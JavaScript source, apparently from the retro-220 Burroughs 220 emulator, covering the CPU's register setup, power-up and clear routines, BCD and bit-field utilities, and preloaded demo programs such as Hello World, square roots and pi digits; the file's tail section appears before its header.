(this.poweredOn) { this.digitCheckAlarm.set(0); this.ALT.set(0); this.MET.set(0); this.TAT.set(0); this.CRT.set(0); this.PAT.set(0); this.HAT.set(0); this.E.set(0x0000); this.readMemory(); this.IB.set(this.IB.value - this.IB.value % 0x100000000 + (this.C.value % 0x10000)*0x10000 + this.P.value % 0x10000); this.writeMemory(); this.P.set(0x0001); if (this.AST.value) { // I/O in progress -- cancel it this.ioComplete(true); } else { this.EXT.set(0); // set to Fetch cycle } if (!this.RUT.value) { this.start(); } } }; /**************************************/ B220Processor.prototype.tcuClear = function tcuClear() { /* Clears the Tape Control Unit */ if (this.poweredOn) { if (this.magTape) { this.magTape.clearUnit(); } } }; /**************************************/ B220Processor.prototype.powerUp = function powerUp() { /* Powers up the system */ if (!this.poweredOn) { this.clear(); this.poweredOn = 1; this.procTimer = this.runTimer = this.instructionCount = 0; this.procTime = this.procSlack = 0; this.procSlackAvg = this.procRunAvg = 0; this.delayDeltaAvg = this.delayRequested = 0; this.console = this.devices.ControlConsole; this.cardatron = this.devices.CardatronControl; this.magTape = this.devices.MagTapeControl; this.computerNotReady.set(1); // initial state after power-up this.updateLampGlow(1); } }; /**************************************/ B220Processor.prototype.powerDown = function powerDown() { /* Powers down the system */ if (this.poweredOn) { this.stop(); this.clear(); this.poweredOn = 0; this.updateLampGlow(1); this.cardatron = null; this.console = null; this.magTape = null; if (this.glowTimer) { clearInterval(this.glowTimer); this.glowTimer = null; } } }; /**************************************/ B220Processor.prototype.loadDefaultProgram = function loadDefaultProgram() { /* Loads a set of default demo programs to the memory drum */ // Simple counter speed test this.MM[ 80] = 0x0000120082; // ADD 82 this.MM[ 81] = 0x0000300080; // BUN 80 this.MM[ 82] = 0x0000000001; // CNST 1 // Hello World this.MM[ 90] = 0x0030090092; // SPO 92 this.MM[ 91] = 0x0000009999; // HLT 9999 this.MM[ 92] = 0x21648455353; // LIT R'HELL' this.MM[ 93] = 0x25600665659; // LIT 'O WOR' this.MM[ 94] = 0x25344000016; // LIT 'LD 'R // Tom Sawyer's "Square Roots 100" adapted from the 205 for the 220 (Babylonian or Newton's method): this.MM[ 100] = 0x0000100139; // CAD 139 this.MM[ 101] = 0x0000400138; // STA 138 this.MM[ 102] = 0x0000100139; // CAD 139 this.MM[ 103] = 0x0002450000; // CLR this.MM[ 104] = 0x0001480005; // SRT 5 this.MM[ 105] = 0x0000150138; // DIV 138 this.MM[ 106] = 0x0000400137; // STA 137 this.MM[ 107] = 0x0000130138; // SUB 138 this.MM[ 108] = 0x0000400136; // STA 136 this.MM[ 109] = 0x0001100136; // CAA 136 this.MM[ 110] = 0x0000180135; // CFA 135 this.MM[ 111] = 0x0001340119; // BCL 119 this.MM[ 112] = 0x0000100138; // CAD 138 this.MM[ 113] = 0x0000120137; // ADD 137 this.MM[ 114] = 0x0002450000; // CLR this.MM[ 115] = 0x0001480005; // SRT 5 this.MM[ 116] = 0x0000150134; // DIV 134 this.MM[ 117] = 0x0000400138; // STA 138 this.MM[ 118] = 0x0000300102; // BUN 102 this.MM[ 119] = 0x5011090139; // SPO 139 this.MM[ 120] = 0x5011090137; // SPO 137 this.MM[ 121] = 0x0010090132; // SPO 132 this.MM[ 122] = 0x0000100139; // CAD 139 this.MM[ 123] = 0x0000120133; // ADD 133 this.MM[ 124] = 0x0000400139; // STA 139 this.MM[ 125] = 0x0000300102; // BUN 102 this.MM[ 126] = 0; this.MM[ 127] = 0; this.MM[ 128] = 0; this.MM[ 129] = 0; this.MM[ 130] = 0; this.MM[ 131] = 0; this.MM[ 132] = 0x20000000016; // carraige return this.MM[ 133] = 0x100000; this.MM[ 134] = 0x200000; this.MM[ 135] = 0x10; this.MM[ 136] = 0; this.MM[ 137] = 0; this.MM[ 138] = 0; this.MM[ 139] = 0x200000; // "Square Roots 100" adapted for floating-point and relative precision: this.MM[ 200] = 0x0000100239; // CAD 239 load initial argument this.MM[ 201] = 0x0000400238; // STA 238 store as initial upper bound this.MM[ 202] = 0x0000100239; // CAD 239 start of loop: load current argument this.MM[ 203] = 0x0002450000; // CR clear R this.MM[ 204] = 0x0000250238; // FDV 238 divide argument by upper bound this.MM[ 205] = 0x0000400237; // STA 237 store as current result this.MM[ 206] = 0x0000250238; // FDV 238 ratio to upper bound this.MM[ 207] = 0x0000400236; // STA 236 store as current precision this.MM[ 208] = 0x0001100235; // CAA 235 load target precision this.MM[ 209] = 0x0000230236; // FSU 236 subtract current precision this.MM[ 210] = 0x0001330218; // BSA 218,1 if current precision > target precision this.MM[ 211] = 0x0000010000; // NOP we're done -- jump out to print this.MM[ 212] = 0x0000100238; // CAD 238 load current upper bound this.MM[ 213] = 0x0000220237; // FAD 237 add current result this.MM[ 214] = 0x0002450000; // CR clear R this.MM[ 215] = 0x0000250234; // FDV 234 divide by 2.0 to get new upper bound this.MM[ 216] = 0x0000400238; // STA 238 store new upper bound this.MM[ 217] = 0x0000300202; // BUN 202 do another iteration this.MM[ 218] = 0x8011090239; // SPO 239 this.MM[ 219] = 0x8011090237; // SPO 237 this.MM[ 220] = 0x0010090232; // SPO 232 this.MM[ 221] = 0x0000010000; // NOP this.MM[ 222] = 0x0000100239; // CAD 239 load argument value this.MM[ 223] = 0x0000220233; // FAD 233 add 1 to argument value this.MM[ 224] = 0x0000400239; // STA 239 this.MM[ 225] = 0x0000300201; // BUN 201 start sqrt for next argument value this.MM[ 226] = 0; this.MM[ 227] = 0; this.MM[ 228] = 0; this.MM[ 229] = 0; this.MM[ 230] = 0; this.MM[ 231] = 0; this.MM[ 232] = 0x20202020216; // carriage return this.MM[ 233] = 0x05110000000; // 1.0 literal: argument increment this.MM[ 234] = 0x05120000000; // 2.0 literal this.MM[ 235] = 0x05099999990; // 0.99999990 literal: target precision this.MM[ 236] = 0; // current precision this.MM[ 237] = 0; // current sqrt result this.MM[ 238] = 0; // current upper bound on result this.MM[ 239] = 0x05120000000; // 2.0 sqrt argument // Print first 800 digits of Pi; adapted from C program by Dik Winter of CWI, Amsterdam this.MM[ 300]= 0x00000100371; // CAD FLIM this.MM[ 301]= 0x00000400365; // STA C C=FLIM this.MM[ 302]= 0x00000100363; // CAD A this.MM[ 303]= 0x00001480010; // SRT 10 this.MM[ 304]= 0x00000150375; // DIV FIVE A DIV 5 this.MM[ 305]= 0x00000420365; // LDB C FOR (B=C; B>=0; --B) this.MM[ 306]= 0x10000401000; // STA - F F[B]=A DIV 5 this.MM[ 307]= 0x00001210306; // DBB *-1,1 this.MM[ 308]= 0x00000100365; // L1 CAD C START OF OUTER LOOP this.MM[ 309]= 0x00000140374; // MUL TWO this.MM[ 310]= 0x00001400368; // STR G G=C*2 this.MM[ 311]= 0x00000370362; // BFR ENDL1,00,00 IF G EQL 0, BRANCH OUT OF LOOP this.MM[ 312]= 0x00000460366; // CLL D D=0 this.MM[ 313]= 0x00000100365; // CAD C this.MM[ 314]= 0x00000400364; // STA B B=C this.MM[ 315]= 0x00000420364; // LDB B this.MM[ 316]= 0x10000101000; // DO CAD - F START OF INNER LOOP this.MM[ 317]= 0x00000140363; // MUL A F[B]*A this.MM[ 318]= 0x00001490010; // SLT 10 SHIFT PRODUCT TO RA this.MM[ 319]= 0x00000120366; // ADD D this.MM[ 320]= 0x00000400366; // STA D D+=F[B]*A this.MM[ 321]= 0x00001480010; // SRT 10 SAVE NEW D IN RR this.MM[ 322]= 0x00001270368; // DFL G,00,1 G-=1 this.MM[ 323]= 0x00000150368; // DIV G D DIV G this.MM[ 324]= 0x10001401000; // STR - F F[B]=D MOD G this.MM[ 325]= 0x00000400366; // STA D D=D DIV G this.MM[ 326]= 0x00001270368; // DFL G,00,1 G-=1 this.MM[ 327]= 0x00000100364; // CAD B this.MM[ 328]= 0x00000130373; // SUB ONE this.MM[ 329]= 0x00000400364; // STA B B-=1 this.MM[ 330]= 0x00000360334; // BFA ENDDO,00,00 IF B EQL 0, BRANCH OUT OF INNER LOOP this.MM[ 331]= 0x00000140366; // MUL D this.MM[ 332]= 0x00001400366; // STR D D*=B this.MM[ 333]= 0x00001210316; // DBB DO,1 DECREMENT RB, REPEAT INNER LOOP IF >= 0 this.MM[ 334]= 0x00014270365; // ENDDO DFL C,00,14 C-=14 this.MM[ 335]= 0x00000100366; // CAD D this.MM[ 336]= 0x00001480010; // SRT 10 this.MM[ 337]= 0x00000150363; // DIV A D DIV A this.MM[ 338]= 0x00000120367; // ADD E RA=E+D DIV A this.MM[ 339]= 0x00001400367; // STR E E=D MOD A // FORMAT 4 DIGITS FOR SPO OUTPUT this.MM[ 340]= 0x00001480003; // SRT 3 ISOLATE HIGH-ORDER DIGIT IN A this.MM[ 341]= 0x00000120376; // ADD N80 CONVERT 1ST DIGIT TO ALPHA this.MM[ 342]= 0x00000490001; // SLA 1 this.MM[ 343]= 0x00001490001; // SLT 1 this.MM[ 344]= 0x00000120376; // ADD N80 CONVERT 2ND DIGIT TO ALPHA this.MM[ 345]= 0x00000490001; // SLA 1 this.MM[ 346]= 0x00001490001; // SLT 1 this.MM[ 347]= 0x00000120376; // ADD N80 CONVERT 3RD DIGIT TO ALPHA this.MM[ 348]= 0x00000490001; // SLA 1 this.MM[ 349]= 0x00001490001; // SLT 1 this.MM[ 350]= 0x00000120376; // ADD N80 CONVERT 4TH DIGIT TO ALPHA this.MM[ 351]= 0x00000490002; // SLA 2 INSERT TRAILING SPACE this.MM[ 352]= 0x00002430000; // LSA 2 SET SIGN TO TWO FOR ALPHA WORD this.MM[ 353]= 0x00000400364; // STA B STORE IN WORD BUFFER this.MM[ 354]= 0x00010090364; // SPO B,1 this.MM[ 355]= 0x00405260369; // IFL COL,04,1 CHECK FOR FULL LINE ON SPO this.MM[ 356]= 0x00000100369; // CAD COL this.MM[ 357]= 0x00000180370; // CFA ECOL this.MM[ 358]= 0x00001340308; // BCL L1 IF COL < ECOL, BRANCH this.MM[ 359]= 0x00010090377; // SPO CR,1 OUTPUT NEWLINES this.MM[ 360]= 0x00000460369; // CLL COL CLEAR COLUMN COUNTER this.MM[ 361]= 0x00000300308; // BUN L1 this.MM[ 362]= 0x00000007557; // ENDL1 HLT 7557 this.MM[ 363]= 0x00000010000; // A CNST 10000 this.MM[ 364]= 0x00000000000; // B CNST 0 this.MM[ 365]= 0x00000000000; // C CNST 0 this.MM[ 366]= 0x00000000000; // D CNST 0 this.MM[ 367]= 0x00000000000; // E CNST 0 this.MM[ 368]= 0x00000000000; // G CNST 0 this.MM[ 369]= 0x00000000000; // COL CNST 0 this.MM[ 370]= 0x00000000050; // ECOL CNST 50 this.MM[ 371]= 0x00000002800; // FLIM CNST 2800 this.MM[ 372]= 0x00000000000; // ZERO CNST 0 this.MM[ 373]= 0x00000000001; // ONE CNST 1 this.MM[ 374]= 0x00000000002; // TWO CNST 2 this.MM[ 375]= 0x00000000005; // FIVE CNST 5 this.MM[ 376]= 0x00000000080; // N80 CNST 80 this.MM[ 377]= 0x20202021616; // CR CNST 20202021616 NEWLINES this.MM[1000]= 0x00000000000; // F DEFN * ARRAY F[2800] // TEMP // Tape tests this.MM[ 400] = 0x1008500000; // MRW 1 this.MM[ 401] = 0x1002580000; // MPE 1 this.MM[ 402] = 0x1000540000; // MIW 0,1,10,100 this.MM[ 403] = 0x1750540100; // MIW 100,1,7,50 this.MM[ 404] = 0x1500550079; // MIR 79,1,5,00 this.MM[ 405] = 0x1101542000; // MIW 2000,1,1,1 // write an EOT block this.MM[ 406] = 0x1008500000; // MRW 1 this.MM[ 407] = 0x1000560000; // MOW 0,1,10,100 this.MM[ 408] = 0x1750560100; // MOW 100,1,7,50 this.MM[ 409] = 0x1500570079; // MOR 79,1,5,00 //this.MM[ 410] = 0x1101562000; // MOW 2000,1,1,1 this.MM[ 410] = 0x1110562000; // MOW 2000,1,1,10 // TEMP: block-length=10, should fire EOT control word this.MM[ 411] = 0x1008500000; // MRW 1 this.MM[ 412] = 0x1000523000; // MRD 3000,1,10,0 this.MM[ 413] = 0x1700524000; // MRD 4000,1,7,0 this.MM[ 414] = 0x1500534350; // MRR 4350,1,5,0 this.MM[ 415] = 0x1100534800; // MRR 4800,1,1,0 // should be an EOT block this.MM[ 416] = 0x1009500000; // MDA 1 this.MM[ 417] = 0x7777009999; // HLT 9999,7777 this.MM[ 79] = 0x1900000000; // preface for 19 words, 80-98 this.MM[ 99] = 0x4000000000; // preface for 40 words, 100-139 this.MM[ 140] = 0x5800000000; // preface for 58 words, 141-198 this.MM[ 199] = 0x9900000000; // preface for 99 words, 200-298 this.MM[ 299] = 0x0000000000; // preface for 100 words, 300-399 this.MM[2000] = 0x9920012002; // end-of-tape control word this.MM[2001] = 0x9999999999; // storage for end-of-tape block state this.MM[2002] = 0x9999008421; // HLT: target for end-of-tape control branch this.MM[2003] = 0x0000300411; // branch to read test sequence };
emulator/B220Processor.js
/*********************************************************************** * retro-220/emulator B220Processor.js ************************************************************************ * Copyright (c) 2017, Paul Kimpel. * Licensed under the MIT License, see * http://www.opensource.org/licenses/mit-license.php ************************************************************************ * Burroughs 220 Emulator Processor (CPU) module. * * Instance variables in all caps generally refer to register or flip-flop (FF) * entities in the processor hardware. See the following documents: * * Burroughs 220 Operational Characterists Manual * (Bulletin 5020A, Burroughs Corporation, revised August 1960). * Handbook of Operating Procedures for the Burroughs 220 * (Bulletin 5023, Burroughs Corporation, November 1959). * Burroughs 220 Schematics * (Technical Manual 4053-1, Burroughs Corporation, December 1958). * Datatron 220 Schematics, Section I [CPU.pdf] * (Technical Manual 4053, Burroughs Corporation, December 1958). * * available at: * http://bitsavers.org/pdf/burroughs/electrodata/220/ * * also: * * An Introduction to Coding the Burroughs 220 * (Bulletin 5019, Burroughs Corporation, December, 1958). * * Burroughs 220 word format: * 44 bits, encoded as binary-coded decimal (BCD); non-decimal codes are * invalid and cause the computer to stop with a Digit Check alarm, also known * as a Forbidden Combination (FC). * * High-order 4 bits are the "sign digit": * Low-order bit of this digit is the actual sign. * Higher-order bits are used in some I/O operations. * Remaining 40 bits are the value as: * 10 decimal digits as a fractional mantissa, with the decimal point * between the sign and high-order (10th) digits * a floating point value with the first two digits as the exponent (biased * by 50) followed by a fractional 8-digit mantissa * 5 two-digit character codes * one instruction word * * Instruction word format: * Low-order 4 digits: operand address * Next-higher 2 digits: operation code * Next-higher 4 digits: control and variant digits used by some instructions * Sign digit: odd value indicates the B register is to be added to the * operand address prior to execution. * * Processor timing is maintained internally in units of milliseconds. * ************************************************************************ * 2017-01-01 P.Kimpel * Original version, cloned from retro-205 emulator/D205Processor.js. ***********************************************************************/ "use strict"; /**************************************/ function B220Processor(config, devices) { /* Constructor for the 220 Processor module object */ var staticLampGlow = false; // compute fractional lamp glow (experimental) this.mnemonic = "CPU"; B220Processor.instance = this; // externally-available object reference (for DiagMonitor) // Emulator control this.cardatron = null; // reference to Cardatron Control Unit this.config = config; // reference to SystemConfig object this.console = null; // reference to Control Console for I/O this.devices = devices; // hash of I/O device objects this.ioCallback = null; // current I/O interface callback function this.magTape = null; // reference to Magnetic Tape Control Unit this.poweredOn = 0; // system is powered on and initialized this.successor = null; // current delayed-action successor function this.tracing = false; // emulator diagnostic tracing flag // Memory this.memorySize = config.getNode("memorySize"); // memory size, words this.bcdMemorySize = B220Processor.binaryBCD(this.memorySize); this.MM = new Float64Array(this.memorySize); // main memory, 11-digit words this.IB = new B220Processor.Register(11*4, this, true); // memory Input Buffer // Processor throttling control and timing statistics this.asyncTime = 0; // time for processor asynchronous operation during I/O this.execClock = 0; // emulated internal processor clock, ms this.execLimit = 0; // current time slice limit on this.execClock, ms this.instructionCount = 0; // total instructions executed this.opTime = 0; // estimated time for current instruction, ms this.procTimer = 0; // elapsed time that the processor has been running, ms this.procTime = 0; // total emulated running time for processor, ms this.runStamp = 0; // timestamp of start of last time slice, ms this.runTimer = 0; // elapsed run-time timer value, ms this.scheduler = 0; // current setCallback token this.procSlack = 0; // total processor throttling delay, ms this.procSlackAvg = 0; // average slack time per time slice, ms this.procRunAvg = 0; // average elapsed time per time slice, ms this.delayDeltaAvg = 0; // average difference between requested and actual setCallback() delays, ms this.delayLastStamp = 0; // timestamp of last setCallback() delay, ms this.delayRequested = 0; // last requested setCallback() delay, ms // Primary Registers this.A = new B220Processor.Register(11*4, this, staticLampGlow); this.B = new B220Processor.Register( 4*4, this, staticLampGlow); this.C = new B220Processor.Register(10*4, this, staticLampGlow); this.D = new B220Processor.Register(11*4, this, staticLampGlow); this.E = new B220Processor.Register( 4*4, this, staticLampGlow); this.P = new B220Processor.Register( 4*4, this, staticLampGlow); this.R = new B220Processor.Register(11*4, this, staticLampGlow); this.S = new B220Processor.Register( 4*4, this, staticLampGlow); // Register E decrements modulo the system memory size, so override dec(). this.E.dec = function decE() { if (this.value == 0) { this.value = this.p.bcdMemorySize; } return this.constructor.prototype.dec.apply(this); }; // Control Console Lamps this.digitCheckAlarm = new B220Processor.FlipFlop(this, staticLampGlow); this.systemNotReady = new B220Processor.FlipFlop(this, staticLampGlow); this.computerNotReady = new B220Processor.FlipFlop(this, staticLampGlow); this.compareLowLamp = new B220Processor.FlipFlop(this, staticLampGlow); this.compareEqualLamp = new B220Processor.FlipFlop(this, staticLampGlow); this.compareHighLamp = new B220Processor.FlipFlop(this, staticLampGlow); // Control Console Switches this.PC1SW = 0; // program control switches 1-10 this.PC2SW = 0; this.PC3SW = 0; this.PC4SW = 0; this.PC5SW = 0; this.PC6SW = 0; this.PC7SW = 0; this.PC8SW = 0; this.PC9SW = 0; this.PC0SW = 0; this.SONSW = 0; // S "On" switch this.SUNITSSW = 0; // S units switch this.STOCSW = 0; // S to C switch this.STOPSW = 0; // S to P switch // Left-Hand Maintenance Panel Switches this.HOLDPZTZEROSW = 0; this.LEADINGZEROESSW = 0; this.PAPERTAPESUMSW = 0; this.ORDERCOMPLEMENTSW = 0; this.MEMORYLOCKOUTSW = 0; this.DCLOCKOUTSW = 0; this.SPDPHOLDSW = 0; this.HOLDSEQUENCE1SW = 0; this.HOLDSEQUENCE2SW = 0; this.HOLDSEQUENCE4SW = 0; this.HOLDSEQUENCE8SW = 0; // Left-Hand Maintenance Panel Registers & Flip-Flops this.CI = new B220Processor.Register(5, this, staticLampGlow); // carry inverters this.DC = new B220Processor.Register(6, this, staticLampGlow); // digit counter (modulo 20) this.SC = new B220Processor.Register(4, this, staticLampGlow); // sequence counter this.SI = new B220Processor.Register(4, this, staticLampGlow); // sum inverters this.X = new B220Processor.Register(4, this, staticLampGlow); // adder X (augend) input this.Y = new B220Processor.Register(4, this, staticLampGlow); // adder Y (addend) input this.Z = new B220Processor.Register(4, this, staticLampGlow); // decimal sum inverters, adder output this.CI.checkFC = B220Processor.emptyFunction; // these registers generate A-F undigits this.SI.checkFC = B220Processor.emptyFunction; this.C10 = new B220Processor.FlipFlop(this, staticLampGlow); // decimal carry toggle this.DST = new B220Processor.FlipFlop(this, staticLampGlow); // D-sign toggle this.LT1 = new B220Processor.FlipFlop(this, staticLampGlow); // logical toggle 1 this.LT2 = new B220Processor.FlipFlop(this, staticLampGlow); // logical toggle 2 this.LT3 = new B220Processor.FlipFlop(this, staticLampGlow); // logical toggle 3 this.SCI = new B220Processor.FlipFlop(this, staticLampGlow); // sequence counter inverter this.SGT = new B220Processor.FlipFlop(this, staticLampGlow); // sign toggle this.SUT = new B220Processor.FlipFlop(this, staticLampGlow); // subtract toggle this.TBT = new B220Processor.FlipFlop(this, staticLampGlow); // tape busy toggle this.TCT = new B220Processor.FlipFlop(this, staticLampGlow); // tape clock toggle this.TPT = new B220Processor.FlipFlop(this, staticLampGlow); // tape pulse toggle this.TWT = new B220Processor.FlipFlop(this, staticLampGlow); // tape write toggle // Right-Hand Maintenance Panel Switches this.MULTIPLEACCESSSW = 0; this.V1V2V3COUNTSW = 0; this.AUDIBLEALARMSW = 0; this.PCOUNTSW = 0; this.DIGITCHECKSW = 0; this.ALARMSW = 0; this.ADCOUNTSW = 0; this.IDLEALARMSW = 0; this.FREQUENCYSELECTSW = 0; this.SINGLEPULSESW = 0; this.FETCHEXECUTELOCKSW = 0; // Right-Hand Maintenance Panel Registers & Flip-Flops this.AX = new B220Processor.Register(10, this, staticLampGlow); // A exponent register this.BI = new B220Processor.Register( 8, this, staticLampGlow); // paper tape buffer inverters this.DX = new B220Processor.Register( 8, this, staticLampGlow); // D exponent register this.PA = new B220Processor.Register( 8, this, staticLampGlow); // PA register this.ALT = new B220Processor.FlipFlop(this, staticLampGlow); // program check alarm toggle this.AST = new B220Processor.FlipFlop(this, staticLampGlow); // asynchronous toggle this.CCT = new B220Processor.FlipFlop(this, staticLampGlow); // ?? toggle this.CRT = new B220Processor.FlipFlop(this, staticLampGlow); // Cardatron alarm toggle this.DPT = new B220Processor.FlipFlop(this, staticLampGlow); // decimal point toggle (SPO) this.EWT = new B220Processor.FlipFlop(this, staticLampGlow); // end of word toggle this.EXT = new B220Processor.FlipFlop(this, staticLampGlow); // fetch(0)/execute(1) toggle this.HAT = new B220Processor.FlipFlop(this, staticLampGlow); // high-speed printer alarm toggle this.HCT = new B220Processor.FlipFlop(this, staticLampGlow); // halt control toggle, for SOR, SOH, IOM this.HIT = new B220Processor.FlipFlop(this, staticLampGlow); // high comparison toggle this.MAT = new B220Processor.FlipFlop(this, staticLampGlow); // multiple access toggle this.MET = new B220Processor.FlipFlop(this, staticLampGlow); // memory (storage) alarm toggle this.MNT = new B220Processor.FlipFlop(this, staticLampGlow); // manual toggle this.OFT = new B220Processor.FlipFlop(this, staticLampGlow); // overflow toggle this.PAT = new B220Processor.FlipFlop(this, staticLampGlow); // paper tape alarm toggle this.PRT = new B220Processor.FlipFlop(this, staticLampGlow); // paper tape read toggle this.PZT = new B220Processor.FlipFlop(this, staticLampGlow); // paper tape zone toggle this.RPT = new B220Processor.FlipFlop(this, staticLampGlow); // repeat toggle this.RUT = new B220Processor.FlipFlop(this, staticLampGlow); // run toggle this.SST = new B220Processor.FlipFlop(this, staticLampGlow); // single-step toggle this.TAT = new B220Processor.FlipFlop(this, staticLampGlow); // magnetic tape alarm toggle this.UET = new B220Processor.FlipFlop(this, staticLampGlow); // unequal comparison toggle (HIT=UET=0 => off) // Left/Right Maintenance Panel this.leftPanelOpen = false; this.rightPanelOpen = false; // Context-bound routines this.boundConsoleOutputSign = B220Processor.prototype.consoleOutputSign.bind(this); this.boundConsoleOutputChar = B220Processor.prototype.consoleOutputChar.bind(this); this.boundConsoleOutputFinished = B220Processor.prototype.consoleOutputFinished.bind(this); this.boundConsoleInputReceiveChar = B220Processor.prototype.consoleInputReceiveChar.bind(this); this.boundConsoleInputInitiateNormal = B220Processor.prototype.consoleInputInitiateNormal.bind(this); this.boundConsoleInputInitiateInverse = B220Processor.prototype.consoleInputInitiateInverse.bind(this); this.boundCardatronOutputWord= B220Processor.prototype.cardatronOutputWord.bind(this); this.boundCardatronOutputFinished = B220Processor.prototype.cardatronOutputFinished.bind(this); this.boundCardatronReceiveWord = B220Processor.prototype.cardatronReceiveWord.bind(this); this.boundMagTapeComplete = B220Processor.prototype.magTapeComplete.bind(this); this.boundMagTapeReceiveWord = B220Processor.prototype.magTapeReceiveWord.bind(this); this.boundMagTapeSendWord = B220Processor.prototype.magTapeSendWord.bind(this); this.boundIoComplete = B220Processor.prototype.ioComplete.bind(this); this.clear(); // Create and initialize the processor state this.loadDefaultProgram(); // Preload a default program } /*********************************************************************** * Global Constants * ***********************************************************************/ B220Processor.version = "1.02a"; B220Processor.tick = 1000/200000; // milliseconds per clock cycle (200KHz) B220Processor.cyclesPerMilli = 1/B220Processor.tick; // clock cycles per millisecond (200 => 200KHz) B220Processor.timeSlice = 13; // maximum processor time slice, ms B220Processor.delayAlpha = 0.000001; // decay factor for exponential weighted average delay B220Processor.delayAlpha1 = 1-B220Processor.delayAlpha; B220Processor.slackAlpha = 0.000001; // decay factor for exponential weighted average slack B220Processor.slackAlpha1 = 1-B220Processor.slackAlpha; B220Processor.neonPersistence = 7; // persistence of neon bulb glow [ms] B220Processor.maxGlowTime = B220Processor.neonPersistence; // panel bulb glow persistence [ms] B220Processor.adderGlowAlpha = B220Processor.neonPersistence/12; // adder and carry toggle glow decay factor, // based on one digit (1/12 word) time [ms] B220Processor.pow2 = [ // powers of 2 from 0 to 52 0x1, 0x2, 0x4, 0x8, 0x10, 0x20, 0x40, 0x80, 0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, 0x4000, 0x8000, 0x10000, 0x20000, 0x40000, 0x80000, 0x100000, 0x200000, 0x400000, 0x800000, 0x1000000, 0x2000000, 0x4000000, 0x8000000, 0x10000000, 0x20000000, 0x40000000, 0x80000000, 0x100000000, 0x200000000, 0x400000000, 0x800000000, 0x1000000000, 0x2000000000, 0x4000000000, 0x8000000000, 0x10000000000, 0x20000000000, 0x40000000000, 0x80000000000, 0x100000000000, 0x200000000000, 0x400000000000, 0x800000000000, 0x1000000000000, 0x2000000000000, 0x4000000000000, 0x8000000000000, 0x10000000000000]; B220Processor.mask2 = [ // (2**n)-1 for n from 0 to 52 0x0, 0x1, 0x3, 0x7, 0x0F, 0x1F, 0x3F, 0x7F, 0x0FF, 0x1FF, 0x3FF, 0x7FF, 0x0FFF, 0x1FFF, 0x3FFF, 0x7FFF, 0x0FFFF, 0x1FFFF, 0x3FFFF, 0x7FFFF, 0x0FFFFF, 0x1FFFFF, 0x3FFFFF, 0x7FFFFF, 0x0FFFFFF, 0x1FFFFFF, 0x3FFFFFF, 0x7FFFFFF, 0x0FFFFFFF, 0x1FFFFFFF, 0x3FFFFFFF, 0x7FFFFFFF, 0x0FFFFFFFF, 0x1FFFFFFFF, 0x3FFFFFFFF, 0x7FFFFFFFF, 0x0FFFFFFFFF, 0x1FFFFFFFFF, 0x3FFFFFFFFF, 0x7FFFFFFFFF, 0x0FFFFFFFFFF, 0x1FFFFFFFFFF, 0x3FFFFFFFFFF, 0x7FFFFFFFFFF, 0x0FFFFFFFFFFF, 0x1FFFFFFFFFFF, 0x3FFFFFFFFFFF , 0x7FFFFFFFFFFF, 0x0FFFFFFFFFFFF, 0x1FFFFFFFFFFFF, 0x3FFFFFFFFFFFF, 0x7FFFFFFFFFFFF, 0x0FFFFFFFFFFFFF] ; B220Processor.multiplyDigitCounts = [1, 14, 27, 40, 53, 66, 65, 52, 39, 26]; /*********************************************************************** * Utility Functions * ***********************************************************************/ /**************************************/ B220Processor.emptyFunction = function emptyFunction() { /* A function that does nothing, used for overriding object methods */ return; }; /**************************************/ B220Processor.bcdBinary = function bcdBinary(v) { /* Converts the BCD value "v" to a binary number and returns it. If a BCD digit is not decimal, coerces it to an 8 or 9 instead */ var d; var power = 1; var result = 0; while(v) { d = v % 0x10; v = (v-d)/0x10; if (d > 9) { d &= 0x09; // turn off the middle 2 bits } result += d*power; power *= 10; } return result; }; /**************************************/ B220Processor.binaryBCD = function binaryBCD(v) { /* Converts the binary value "v" to a BCD number and returns it */ var d; var power = 1; var result = 0; while(v) { d = v % 10; result += d*power; power *= 0x10; v = (v-d)/10; } return result; }; /**************************************/ B220Processor.padLeft = function padLeft(v, digits, pad) { /* Converts "v" to a string if necessary and formats to a total length of "digits," padding with the "pad" character on the left. Used only for debug */ var padChar = (pad || "0").toString(); var s = v.toString(); var len = s.length; if (len > digits) { s = s.substring(len-digits); } else { while (len < digits) { s = padChar + s; ++len; } } return s; }; /**************************************/ B220Processor.formatWord = function formatWord(w) { /* Formats the BCD value of 220 word "w" as the customary "9 9999 99 9999" */ var s = B220Processor.padLeft(w.toString(16), 11); return s.substring(0, 1) + " " + s.substring(1, 5) + " " + s.substring(5, 7) + " " + s.substring(7); }; /*********************************************************************** * Bit and Field Manipulation Functions * ***********************************************************************/ /**************************************/ B220Processor.bitTest = function bitTest(word, bit) { /* Extracts and returns the specified bit from the word */ var p; // bottom portion of word power of 2 if (bit > 0) { return ((word - word % (p = B220Processor.pow2[bit]))/p) % 2; } else { return word % 2; } }; /**************************************/ B220Processor.bitSet = function bitSet(word, bit) { /* Sets the specified bit in word and returns the updated word */ var ue = bit+1; // word upper power exponent var bpower = // bottom portion of word power of 2 B220Processor.pow2[bit]; var bottom = // unaffected bottom portion of word (bit <= 0 ? 0 : (word % bpower)); var top = // unaffected top portion of word word - (word % B220Processor.pow2[ue]); return bpower + top + bottom; }; /**************************************/ B220Processor.bitReset = function bitReset(word, bit) { /* Resets the specified bit in word and returns the updated word */ var ue = bit+1; // word upper power exponent var bottom = // unaffected bottom portion of word (bit <= 0 ? 0 : (word % B220Processor.pow2[bit])); var top = // unaffected top portion of word word - (word % B220Processor.pow2[ue]); return top + bottom; }; /**************************************/ B220Processor.bitFlip = function bitFlip(word, bit) { /* Complements the specified bit in word and returns the updated word */ var ue = bit+1; // word upper power exponent var bpower = // bottom portion of word power of 2 B220Processor.pow2[bit]; var bottom = // unaffected bottom portion of word (bit <= 0 ? 0 : (word % bpower)); var middle = // bottom portion of word starting with affected bit word % B220Processor.pow2[ue]; var top = word - middle; // unaffected top portion of word if (middle >= bpower) { // if the affected bit is a one return top + bottom; // return the result with it set to zero } else { // otherwise return bpower + top + bottom; // return the result with it set to one } }; /**************************************/ B220Processor.fieldIsolate = function fieldIsolate(word, start, width) { /* Extracts a bit field [start:width] from word and returns the field */ var le = start-width+1; // lower power exponent var p; // bottom portion of word power of 2 return (le <= 0 ? word : (word - word % (p = B220Processor.pow2[le]))/p ) % B220Processor.pow2[width]; }; /**************************************/ B220Processor.fieldInsert = function fieldInsert(word, start, width, value) { /* Inserts a bit field from the low-order bits of value ([48-width:width]) into word.[start:width] and returns the updated word */ var ue = start+1; // word upper power exponent var le = ue-width; // word lower power exponent var bpower = // bottom portion of word power of 2 B220Processor.pow2[le]; var bottom = // unaffected bottom portion of word (le <= 0 ? 0 : (word % bpower)); var top = // unaffected top portion of word (ue <= 